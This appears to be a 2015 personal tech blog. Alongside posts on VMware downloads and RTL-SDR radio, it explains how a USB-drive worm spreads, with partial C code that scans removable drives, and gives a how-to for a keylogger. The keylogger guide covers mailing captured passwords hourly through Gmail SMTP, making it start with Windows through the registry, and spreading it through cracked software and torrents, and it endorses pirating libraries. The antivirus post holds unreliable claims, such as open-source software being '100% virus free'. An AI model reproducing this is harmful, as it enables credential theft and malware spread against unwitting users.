Thursday, 26 November 2015

VMware Player Integration Tools download

I have found, many times when attempting to download  the vmware through virual machines it never work ..

here is the direct link of the packages ..  just go there select your version ... download it ...

https://softwareupdate.vmware.com/cds/vmw-desktop/player/


For example 6.0.3 version Windows package 

https://softwareupdate.vmware.com/cds/vmw-desktop/player/6.0.3/1895310/windows/packages/

How to Protect your PC from virus - Simple Tips

I never use Antivirus , Speedup tools etc Why ?


There are some secrets, which I have been using for years , system Admins will never tell  you about  this.. Here is the technique I follow.



1. Rule One:  Startup is evil 


Location a:


 Type "Msconfig" in the run box  (I use Win 7)

or Start ->  Accessories -> Run 




In the "startup Tap "  , Just untick them one by one .. Windows services never use this place for starting the OS file , so dont show any mercy ..  If you feel it is trusted application & need to be started automatically every time you login , then leave it..


Location b:  Startup Menu /Folder 

Go to  Start -> Startup, You can see the exe files ..


Just right click & delete it .. 

Actual path is 

C:\Users\username\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Startup

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Remember this path is hidden , to open up , use the "folder option " (  explained below )

Delete the suspicious program ( Even you can delete all , Windows never use this place to keep OS files )




2. Rule 2 :  Find the history of  the bitch, before kissing 


How you are getting virus to your system ?   Either through Pendrive or File download 

When ever you connect “pen drive” verify the files  .  Don’t show any mercy on untrusted “exe”  files .. just delete it ..  


while Inserting pendrive watchout  for 

    a. Hidden files 
    b. Hidden extension (.exe)
   c. Hidden System files 

In the file explorer window click  "Organize "   , for  XP users  Tools -> Folder Option





Select " Show hidden files"  & uncheck the below 2 check box..

Now Windows will show all the files ...    ( Caution : Do not delete system files , specially in the OS directory , just restrict to pen drive files.  Once done reverse the folder options )

Don’t be afraid to  connect virus affected pen drives to your system . Just manually verify the files .. some exe files look like folder … So Do not click on anything , unless you are sure about the files...

Wait I will put a virus on my pen drive & show you 





You have deleted those files ?  Done ?   Empty the recycle bin tooo..

Once done ,Revert back the "Folder option "


While Downloading from Internet 

1. Make sure you are downloading from authorized site  , Check the site "About Us "  Contact details 
    everything .. A genuine company do not put Virus on your computer 

2.In case it is "Open source " download it , no issue ... If they are providing source code , it will be 100% virus free ...  In case any issues , you can go through the code & compile it yourself  ..

3.Read forums , review  & see what others are saying about it. (take risk)

4. double Click the file, windows will give you " Security warning"



If the publisher is Unknown , be careful while installing ..   Remember there are many genuine software maker who dont buy certificates ,  so follow the first three rules .. "From Where you are downloading? , is it open source? , reviews?"

5. It could be virus but I want to Install it at any cost ... I have no option 

Go to Install Vmware Player /Workstation , In that Install Virtual XP , Win 7 , Win 8 , Win 10 
Run the application on that OS , See the response .., If everything goes well no issue ..
Otherwise delete the virtual OS ... Simple ...

Wednesday, 25 November 2015

RTL SDR - AM Radio

Recently I brought RTL SDR from china

http://www.aliexpress.com/item/Free-Shipping-Quality-USB-2-0-Digital-DVB-T-SDR-DAB-FM-HDTV-Tuner-Receiver-RTL2832U/32410728890.html





It works 24 – 1766 MHz range ..

What we can do with this device?

1.FM reception 88-108MHz

2.Air traffic Control -  118–136.975 MHz  , To know the near by Airport frequency just  Google it . 
   For India-  the list of frequencies are , Give a try :)
      http://ivao.in/resources/atc-frequencies-list/

3.AM , Short wave , HAM Radio comes under the range 0-30MHz which is not in the range of this device ..


Up-Converters 

Up-converters are available which is bit costly ,  Better to make our own device. 
There is one Upconverter which is very impressive & components are readily available in Element14 /aliexpress




Before that, I want to try once direct sampling method 
Normally people use transformer balun to get balanced RF input .. I haven't used that just soldered one pin . 





Soldered 



Now close the cape 



Connect to PC- add 1 Meter wire ..



Its Show time 



Saturday, 7 November 2015

How a pen drive virus works?

Have you ever been affected by pen drive virus ?

Did you ever notice that all your folders are replaced with "folder imaged" exe?.










How it works?

It is build on top of Two components 

1. Payload section -> can be a key logger , data mining stuffs ,pots 

2. Pen drive distribution


Here is the flow chart 

                               Virus running(on startup)                                                         
                                                 |                            
             check whether a pen drive connected or not                                                          
                                                |                         
            check it is infected or not( why wasting cpu?)                                                 
                                                |                        
      Ensure that our virus is named after all the folders                         
 if there is a folder named "photos" create our virus in the
 name of "photos.exe"    
                                                |            
now pen drive removed &  user is connecting it to other PC ... 
    looking for photos folder  fk .. no files                                                         
                                                |         
 Our Virus is running on the background ->
 Install the virus (just copy the exe to a secret folder ), 
make the registry entry to start virus whenevery pc boots ..                                                  
                                                |                                                    
                                             done
            

Only Distribution - for  Keylogger pls refer the previous post 

CALLBACK TimerProc(HWND hwnd, UINT uMsg, unsigned int idEvent, DWORD dwTime)
{


int a  =GetLogicalDrives();

for (int i=0;i<12;i++) // 12 drives ,more than enough man
{
bit= (a>>i)&0x1;
if (bit)
{
switch(i)
{
case 0:
    continue;
break;
case 1:
strcpy(Str,"B:\\");
break;
case 2:
strcpy(Str,"C:\\");
break;
case 3:
strcpy(Str,"D:\\");
break;
case 4:
strcpy(Str,"E:\\");
break;
case 5:
strcpy(Str,"F:\\");
break;
case 6:
strcpy(Str,"G:\\");
break;
case 7:
strcpy(Str,"H:\\");
break;
case 8:
strcpy(Str,"I:\\");
break;
case 9:
// Str="J:\\";
strcpy(Str,"J:\\");
break;
case 10:
// Str="K:\\";
strcpy(Str,"K:\\");
break;
case 11:
strcpy(Str,"L:\\");
break;
}

}
    if (GetDriveType(Str)== DRIVE_REMOVABLE)   //  Me pendrive <- feed me
{
               // make a self copy
              // delete the folders 
        }

}

Custom Made Keyloggers

How many hours will it take for someone who has little C knowledge to write a custom keylogger?

What you need to know..

1.  key hooks

2. SMTP Library/ FTP library (only if you have ftp hosts ) , so many off -the self libraries and packages available just google it..  The one I use is  from
 http://www.chilkatsoft.com/

3. Thats all its done ...


Then think about ,how do you want to distribute this keyloggers to outside world?..
Pendrive , mails , keygen , cracked software , fake url,  torrents etc ......  


no  need to capture screen shots , no need to record skype chat , once you have the password , you can do anything ..

You cant separate hooks from OS ...  be it Microsoft or apple or linux .. its part of the OS


                                                     Detailed Design


Keylogger source 

  
Try it in your own PC , don't put yourself in trouble ..  Thats my advice..

There is one best article from Dor Alon Published in Codeproject .. It works well with VC++ 6



It has 2 modules , one is a DLL , which is used to hooks the keys .. & another one is exe ..   

Email /FTP forwarding 

If you wish to store it as a file , do a file write operation & attach it to the mail..

If you dont like file operation , keep it in a bufffer string & paste it in the Email body.

Remember one thing, there are only  few ports are allowed by most firewalls , so use SMTP.. Thats best .. He has used FTP , where will we get free FTP servers ?.. Some of them are  available but don't know how it works , how safe it is to save our passwords?.   

I recommend you to use SMTP

chilkatsoft has a SMTP library , as usual cracks softwares are there everywhere , what to do , we are poor we don't have money to buy these software..  The concept of money making is a flawed theory , so all is fair ..  If God was fair to us , you & me won't be poor
now :) 


void ChilkatSample(void)
    {
    //  The mailman object is used for sending and receiving email.
    CkMailMan mailman;
 
    //  Any string argument automatically begins the 30-day trial.
    bool success;
    success = mailman.UnlockComponent("30-day trial");
    if (success != true) {
        printf("%s\n",mailman.lastErrorText());
        return;
    }
 
    //  Set the SMTP server.
    mailman.put_SmtpHost("smtp.chilkatsoft.com");
 
    //  Set the SMTP login/password (if required)
    mailman.put_SmtpUsername("myUsername");
    mailman.put_SmtpPassword("myPassword");
 
    //  Create a new email object
    CkEmail email;
 
    email.put_Subject("This is a test");
    email.put_Body("This is a test");
    email.put_From("Chilkat Support <support@chilkatsoft.com>");
    email.AddTo("Chilkat Admin","admin@chilkatsoft.com");
    //  To add more recipients, call AddTo, AddCC, or AddBcc once per recipient.
 
    //  Call SendEmail to connect to the SMTP server and send.
    //  The connection (i.e. session) to the SMTP server remains
    //  open so that subsequent SendEmail calls may use the
    //  same connection.
    success = mailman.SendEmail(email);
    if (success != true) {
        printf("%s\n",mailman.lastErrorText());
        return;
    }
 
    //  Some SMTP servers do not actually send the email until
    //  the connection is closed.  In these cases, it is necessary to
    //  call CloseSmtpConnection for the mail to be  sent.
    //  Most SMTP servers send the email immediately, and it is
    //  not required to close the connection.  We'll close it here
    //  for the example:
    success = mailman.CloseSmtpConnection();
    if (success != true) {
        printf("Connection to SMTP server not closed cleanly.\n");
    }
 
    printf("Mail Sent!\n");
    }


Create one gmail account , add the above settings  & few changes , because gmail works on ssl

Remember Gmail support SSL /TLS,  
mailman.put_SmtpHost("smtp.gmail.com");
mailman.put_SmtpPort(465);
mailman.put_SmtpSsl(true);

The fuck what I don't like with chilkat/ MFC is , it is bulky , if you add this as a static library.. it takes huge space ..  2 MB :) ..   

Now your key logger is integrated with smtp  ... Put a timer & set the time to 1hour  , every hour , it sends a message to you.. 

again google allows , 15 simultaneous mail access ..  means at a time you can access a single gmail from 15 other places ... 

Now  your keylogger integrated with a SMTP server ... 



Windows has  several startup location , there is a tool called "Hijackthis" , it highlights all of them.. At the begining of the code , add a line to make the registry entry in the startup locations .. So that it can start itself .. done 


Note :

I should talk about antivirus here...  Most antivirus softwares just block every exe ..  Some of them block based on historical signatures like checksum , name , date of creation , size etc ..if I explain how antivirus  works  , you will never use any antivirus in your life time.  

Complete VC++6 source code is available 100$ ...